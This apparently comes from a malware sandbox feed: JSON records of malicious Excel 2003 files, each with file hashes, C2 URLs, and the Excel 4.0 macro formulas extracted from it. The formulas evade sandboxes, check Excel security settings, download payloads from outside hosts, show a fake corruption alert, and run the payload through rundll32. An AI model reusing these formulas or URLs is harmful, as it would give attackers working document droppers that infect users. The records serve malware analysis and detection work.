{"version":"0.2","sample":{"sample":"","kind":"file","target":"48ed0191e8b29b03b8c95b94736b89baa1fa100871cd31b9a8b053d82ebc7ba9"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48ed0191e8b29b03b8c95b94736b89baa1fa100871cd31b9a8b053d82ebc7ba9","filesize":167936,"md5":"bed9210365e536c2d5c7c67b71537b31","sha1":"a1184d8b56ed375526d5e1915cd74893a7bc69f9","sha256":"48ed0191e8b29b03b8c95b94736b89baa1fa100871cd31b9a8b053d82ebc7ba9","sha512":"4c150819df09bd25f50160394f3e0155fa832a422020dc7da00e9e5b3e1799eb9b3b5d5f107e4dbb023e3b71f4a8eff20a9985785e1e2b98395407cdbc2383a0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48ed0191e8b29b03b8c95b94736b89baa1fa100871cd31b9a8b053d82ebc7ba9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"66BevRjOTv\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"48f538eff4b848c713404226f79d2e693cf80d9d9894568011567a01e2886b32"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48f538eff4b848c713404226f79d2e693cf80d9d9894568011567a01e2886b32","filesize":206336,"md5":"e2c9f06dd66a0d6a61b1209cf41b3f6d","sha1":"9f30367790ff1eb98d769e7fa10dd8ca3b47ab18","sha256":"48f538eff4b848c713404226f79d2e693cf80d9d9894568011567a01e2886b32","sha512":"ba45ad88f42c4b13fce9242b9d065954de40e81d41a01ee3e0a2566b682497d9cc069b9f41f92f83a7e3c2b353cd9c87a012e035542feaef784f7070438a649a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48f538eff4b848c713404226f79d2e693cf80d9d9894568011567a01e2886b32.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fGAQklZqFR\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"48fdc7105b8ea7de7f04606d31ae286ee5b7d6b1a4ef698cb6a4f2e3d881ad66"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"48fdc7105b8ea7de7f04606d31ae286ee5b7d6b1a4ef698cb6a4f2e3d881ad66","filesize":207360,"md5":"a6e8c230ed774b2a4cfa8eed572c2e74","sha1":"88a8c2376d19bdf5f5f75ffe77505d94f8108868","sha256":"48fdc7105b8ea7de7f04606d31ae286ee5b7d6b1a4ef698cb6a4f2e3d881ad66","sha512":"cd0ff6b52dad4f4a7528c64b95cfaee2c7a8407fb5cff206b298e2fcf00f2e3a653445bb46c6cfb06fdf7ead16a5e58afb3d259353b54789f844d468ab66f249","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"48fdc7105b8ea7de7f04606d31ae286ee5b7d6b1a4ef698cb6a4f2e3d881ad66.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"QoRogkJNmh\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"490e06b3ffbd4838664850d0419b4331b0445163c17751755494562dce8d582d"},"analysis":{"reported":"2020-04-09T16:16:08Z","score":10},"files":[{"filename":"490e06b3ffbd4838664850d0419b4331b0445163c17751755494562dce8d582d","filesize":167936,"md5":"ecd6048dd3af72daedc11b32fa3eca3f","sha1":"afd2dcdae755c999bbc0b387473dee9c5f012cf1","sha256":"490e06b3ffbd4838664850d0419b4331b0445163c17751755494562dce8d582d","sha512":"32aeeff1f01b5e0e4915adfb7180d26796ab460514b16fd7fc7e2e1f66409ab4be4d7fc7d9291c4e8eba73510d307c88d27bad57c1580ea14a4bd40174717ca8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"490e06b3ffbd4838664850d0419b4331b0445163c17751755494562dce8d582d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HDUYFta77k\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4920139e30cfe2dce4b7197ab6ae7bd454802f4d5c578e463605c0b321a21b6d"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"4920139e30cfe2dce4b7197ab6ae7bd454802f4d5c578e463605c0b321a21b6d","filesize":170496,"md5":"5c6f0421fba4629a90f096c241c25445","sha1":"73363a1a3bf43741c9dd4ef2e86179b62bd6d03e","sha256":"4920139e30cfe2dce4b7197ab6ae7bd454802f4d5c578e463605c0b321a21b6d","sha512":"82b246200d588f6761a3a925fcf5a66bb8ed90837f85b37609363b97a3dea6a97a329d9679d3d1a0c1b2cfd5cb94a6857e87e851b27d33b6be8e18471ffe8460","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4920139e30cfe2dce4b7197ab6ae7bd454802f4d5c578e463605c0b321a21b6d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"l8s61eiCSg\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"49229b7a6c1031f76f1a24b7f75c1b896e345979a074b33147caa26015c203de"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"49229b7a6c1031f76f1a24b7f75c1b896e345979a074b33147caa26015c203de","filesize":168448,"md5":"acc54c49464a4e70e9e13bf8043fac22","sha1":"054fc4d2db3e0beeeba241f65dfc8d04eafc947a","sha256":"49229b7a6c1031f76f1a24b7f75c1b896e345979a074b33147caa26015c203de","sha512":"a2d8be6b015bb02d3dd98c4c02d1621216a3e2715daa6e1b6c7868257b160323b8160561db5f7dc2970dacc01b6a5479df09b4f5d379742fd4a9a5d6b96884c7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"49229b7a6c1031f76f1a24b7f75c1b896e345979a074b33147caa26015c203de.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"g334YrepRY\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"49245588240f2a567a62d0aeb54ab0b5897242e7d32218936d1acfdb702e2856"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"49245588240f2a567a62d0aeb54ab0b5897242e7d32218936d1acfdb702e2856","filesize":141824,"md5":"7a77d320044a881a4a35e92eaf7e8da3","sha1":"0300b737ae7880008593bfcfd66e0be239181a42","sha256":"49245588240f2a567a62d0aeb54ab0b5897242e7d32218936d1acfdb702e2856","sha512":"43203ba8c669a5d18b20662b54057b11b6e88f84fd803113bd50b984b6f891bfa288e349122aad9ebd44207ce9d9ef54cdb4b79216adf76bf567f092ada76349","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"49245588240f2a567a62d0aeb54ab0b5897242e7d32218936d1acfdb702e2856.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"hhw6FTormr\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4966c664c859a6a2702c97739303ba7d5e52cccbc0c07b491007171a324948b4"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"4966c664c859a6a2702c97739303ba7d5e52cccbc0c07b491007171a324948b4","filesize":206336,"md5":"91fd56cddf820f3be10a721a8d4bc4d6","sha1":"fdae2fc100d6f00956054a509ff677e2267d8512","sha256":"4966c664c859a6a2702c97739303ba7d5e52cccbc0c07b491007171a324948b4","sha512":"e9932f84f607493a07e413e6ea7d73f8d3a93696c2d48f016d0c5523dbcf000d11306de183d461ce2ad6c189803dcbd65f6088a3580efc0e71f73808ced26742","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4966c664c859a6a2702c97739303ba7d5e52cccbc0c07b491007171a324948b4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"liv0EjusOg\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4971313040337ac701f0c9138285d49bf9e1d034370631719996a2af5e43d6b6"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"4971313040337ac701f0c9138285d49bf9e1d034370631719996a2af5e43d6b6","filesize":206336,"md5":"0c3699282bdeeb9b6149bfee6bdebd74","sha1":"e9f0ea5dfaaa0c9449d463d757d69eca91ffde32","sha256":"4971313040337ac701f0c9138285d49bf9e1d034370631719996a2af5e43d6b6","sha512":"1900dcd64e11f7e14b2554bfc35a64be6603fb38ecb7624438bf02fe8a95aaa487157ee39e2c51b30241ef97a3b37dc9e7931ab8d2d108217e4ca8c37a521e6b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4971313040337ac701f0c9138285d49bf9e1d034370631719996a2af5e43d6b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"U4c63VSwYf\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4971c85179f0cbd85ffe85a63b1f37f23213ea5fb1b5fa4d53687f678f93b77e"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"4971c85179f0cbd85ffe85a63b1f37f23213ea5fb1b5fa4d53687f678f93b77e","filesize":221184,"md5":"2ae0e8d347fcd22d2ea614f0ea276397","sha1":"055acda7120b5c12ef665f595359f93192e59b89","sha256":"4971c85179f0cbd85ffe85a63b1f37f23213ea5fb1b5fa4d53687f678f93b77e","sha512":"757bf9f85419f5c172e43fb0873d06714463a9a58d3b7709772c0b249568ea96ecc3d59c34bf12f024c2451514e2242acd310ca24df7d4413bf27f2cd84ce861","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4971c85179f0cbd85ffe85a63b1f37f23213ea5fb1b5fa4d53687f678f93b77e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dOWV1h8TpN\",TRUE)\nGOTO(R$3C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"4978bccf3945b209f9abf83819492428f1336ada1dfc96aa9eb84d70e018c4d3"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"4978bccf3945b209f9abf83819492428f1336ada1dfc96aa9eb84d70e018c4d3","filesize":104448,"md5":"9e2cf674486c6bcd64d1073f391aeca4","sha1":"ae9bd4b91a76ce6678e9f675c1e1aa79dc7a7eb1","sha256":"4978bccf3945b209f9abf83819492428f1336ada1dfc96aa9eb84d70e018c4d3","sha512":"2aae9b30f61a92b87ed477dfe01f7e14bcbdef268853fb7ddec010f5ee2b025660368625ef12803b9f1f7f125254d35f73af1eb80d2763cbdbdb0af0c1a3804e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"4978bccf3945b209f9abf83819492428f1336ada1dfc96aa9eb84d70e018c4d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"1QxMx6GhQ7\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"499133565cb37b3213f18213378888c57779a60f2778cbdec6df0b34cd6bb9ee"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"499133565cb37b3213f18213378888c57779a60f2778cbdec6df0b34cd6bb9ee","filesize":171008,"md5":"955fb7bface53885bbaf91c299ee2d2f","sha1":"6005982a6cbdb3a141f7c690031e735325a1bac1","sha256":"499133565cb37b3213f18213378888c57779a60f2778cbdec6df0b34cd6bb9ee","sha512":"ebcc12ab15f843d6d796fe932b7bd61ff1062711ba8a2406cad20153d83f7a196fa172cc6263baa3a73a1afe78b85bb55e6becfc6aeb62ba2cae2130327eeda2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"499133565cb37b3213f18213378888c57779a60f2778cbdec6df0b34cd6bb9ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5ZpBnhdqUZ\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"49af87ff45de26231b4fcadea863eea596be023384261a29c7bf2b027475bdf9"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"49af87ff45de26231b4fcadea863eea596be023384261a29c7bf2b027475bdf9","filesize":168448,"md5":"2a492647b49b14f8ee9adb6a96ab8b86","sha1":"934aac9f94391e1b8f7d302ae9062dd922efce37","sha256":"49af87ff45de26231b4fcadea863eea596be023384261a29c7bf2b027475bdf9","sha512":"e606d807c8a52893accaf9c1d9c71287b7b02d070191307345dffbf742f35a03a605601e55ca2b5076b720bb8069a86e70f814c08b67203717053a4bebf63623","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"49af87ff45de26231b4fcadea863eea596be023384261a29c7bf2b027475bdf9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8qfjRvurqT\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"49b7bf47989931938794aa457a6363fe66f0e9c20cde94b32831683fcb9a817c"},"analysis":{"reported":"2020-04-09T16:16:09Z","score":10},"files":[{"filename":"49b7bf47989931938794aa457a6363fe66f0e9c20cde94b32831683fcb9a817c","filesize":167936,"md5":"15162b72e09cad18cf3266427a424a15","sha1":"a749f7fd99fadea1652d839aa630d5b9a63a41bc","sha256":"49b7bf47989931938794aa457a6363fe66f0e9c20cde94b32831683fcb9a817c","sha512":"52b650eca83105ad6fda4e24baa7a25c70b4291115a8d3eeaf437566217d8d5a9ab113263405a50d9362fc8cddbb068e3f8b44beddd5f571492e1b8f258b3af4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"49b7bf47989931938794aa457a6363fe66f0e9c20cde94b32831683fcb9a817c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, 